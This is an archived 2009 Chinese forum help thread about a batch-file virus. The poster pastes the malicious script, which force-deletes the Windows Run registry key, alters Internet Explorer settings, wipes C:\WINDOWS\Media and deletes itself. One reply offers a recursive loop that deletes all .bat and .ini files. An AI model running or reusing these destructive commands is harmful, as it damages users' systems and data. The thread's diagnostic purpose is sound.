中国DOS联盟论坛 - Powered by Discuz! Board

标题: 救我急等！重装系统无用:有黑心贼用批处理写的病毒 [打印本页]

作者: ednykissyou 时间: 2009-1-19 14:07 标题: 救我急等！重装系统无用:有黑心贼用批处理写的病毒

当我一开机,我的机子上就会先运行一个批处理文件,一闪而过,然后机子就感到明显的慢,如果我的机子刚好直接接到互联网上的话,我的输入法就会一闪一闪的,很明显有人把我当肉机替他干活啦,我重做了系统也不管用。我现在就不敢插网线！
我在C盘rogram Files下发现五六个批处理文件,看起来就很怪,文件名是HVPJDJ、2REQOYN、3JF3D1HZ、6NHKWGC3MZR、IBCCGT399，还有360也监测到这些文件名.lnK格式的程序要写入“启动项”。我用编辑的方形打开这些批处理，写着的是以下的东西（另附三个这样的文件在附件）：另外我的U盘图标也尽然变成了文件夹图标：

S8VRADGPQ5MAHCZFQ
regsvr32.exe /s jscript.dll
ML3AI83XDNC7J
reg.exe delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /F
6FE1R3J1FDUY3W2970M
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Background_Sounds /t REG_SZ /d no /F
1J4LHXN7H60QXZX
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v Play_Animations /t REG_SZ /d no /F
W7RRQ9PJRUJMJNP6QTKJN
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Videos" /t REG_SZ /d no /F
T0XEV3MPCG9DJ3UYM
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Display Inline Images" /t REG_SZ /d yes /F
OT4GTFMM3TC1W3O
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Disable Script Debugger" /t REG_SZ /d yes /F
INY7J0XKQQJJH6TSEYY
reg.exe ADD "HKCU\Software\Microsoft\Internet Explorer\Main" /v DisableScriptDebuggerIE /t REG_SZ /d yes /F
FGBLS9X1PS7CZZF5O
del C:\WINDOWS\Media\*.*
93WTMK5DDM00OM9M

del %0
exit

AIAA43V3VR79OD

附件 1: 黑贼的脚本.rar (2009-1-19 14:07, 2.96 K,下载次数： 34)

作者: pkto 时间: 2009-1-19 14:30
看以上情形，楼主应该先查清病毒来源，然后再考虑对付病毒。一般来说，有以下来源，请楼主对应查一下：
1、安装的系统盘本身带毒；
2、楼主的U盘不干净，建议先在其它机子上查一下，并且删除U盘上的可疑文件；
3、安装完系统后，不要急着使用，先打开其它分区（用招标右键打开，不要双击，避免再次感染），然后遍历分区，查出所有可能的bat和脚本(js或者ini等)，然后一一清除；
4、确认一切OK后，安装杀毒软件、防火墙、升级补丁。

提供一个遍历删除的批处理：

for /r %%i in (.) do (
del "%%i\*.bat"
del "%%i\*.ini"
)

作者: windows4dos 时间: 2009-1-19 15:00
第一时间先清理进程！
只是删除病毒文件没用的！一般都有保护，删了又会生成的！
给个方案：
进入WinPE系统，安装杀软检查，然后重装系统，安装系统完成后先不要运行其它盘的文件，特别是EXE,COM等高危文件！很可能它们已被感染！正确的方法是设置显示隐藏文件，删除所有可疑文件，再尽量从压缩的备份中解压出来使用，这样可以安全些，杀软方面自己找找，找个强些的，应该可以杀到，另推荐几个工具
Autoruns 冰刃 SREng 狙剑网幽工具

作者: luckboy45 时间: 2009-1-19 17:22
病毒问题请访问http://www.du110.com/index.php可以在病毒救援区发贴,不用注册也可以发求助.
http://110.du110.com/down/6.zip下载该工具后扫描日志并发去论坛,我是那边斑竹,可以帮你看看.

作者: cad55 时间: 2009-1-20 10:13
在DOS下重新分区
暂时不用，U盘，等自认为安全的工具，重装新系统。。

应不会出现楼主所说的这样问题。

作者: netbenton 时间: 2009-1-20 12:36
用安全的光盘启动,
重写主引导,用ghost安装系统,设置好防火墙后,安装杀素软件,开启实时监控,马上升级杀毒软件,打补丁,再对其它分区全盘扫描

[ Last edited by netbenton on 2009-1-20 at 12:37 ]

作者: yishanju 时间: 2009-1-20 15:44
用启动盘进DOS ,删除所有盘下的AUTORUN.INF　和关联的可执行文件，然后重装系统

装个MAXDOS ，启动时选择进DOS 删除所有盘下的AUTORUN.INF　和关联的可执行文件，然后重装系统

作者: 313885174 时间: 2009-1-20 20:24
我想问下没行的代码表示什么?\
比如:S8VRADGPQ5MAHCZFQ

作者: yishanju 时间: 2009-1-21 01:36
....

很明显是恶意文件的名字